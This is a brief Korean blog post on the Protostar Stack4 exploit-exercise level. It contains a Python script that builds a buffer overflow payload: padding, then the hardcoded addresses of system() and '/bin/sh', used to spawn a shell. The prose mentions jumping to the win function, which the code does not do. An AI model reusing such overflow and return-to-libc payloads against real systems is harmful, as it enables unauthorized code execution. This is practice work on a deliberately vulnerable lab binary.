이번에는 코드 플로우를 바꿔보라고 합니다.
ret를 win 함수의 주소로 바꿔줍시다.
#coding: utf-8 from struct import pack, unpack p = lambda x: pack("<L", x) up = lambda x: pack("<L", x)[0] system = 0xb7ecffb0 binsh = 0xb7fb63bf win = 0x80483f4 payload = 'A'*76 payload += p(system) payload += 'B'*4 payload += p(binsh) print payload
stack4.py
쉘도 따줍시다.
'Wargame > Protostar:Exploit-Exercises' 카테고리의 다른 글
| [Protostar : Exploit-Exercises] Stack6 (0) | 2016.09.24 |
|---|---|
| [Protostar : Exploit-Exercises] Stack5 (0) | 2016.09.24 |
| [Protostar : Exploit-Exercises] Stack3 (0) | 2016.09.24 |
| [Protostar : Exploit-Exercises] Stack2 (0) | 2016.09.24 |
| [Protostar : Exploit-Exercises] Stack1 (0) | 2016.09.24 |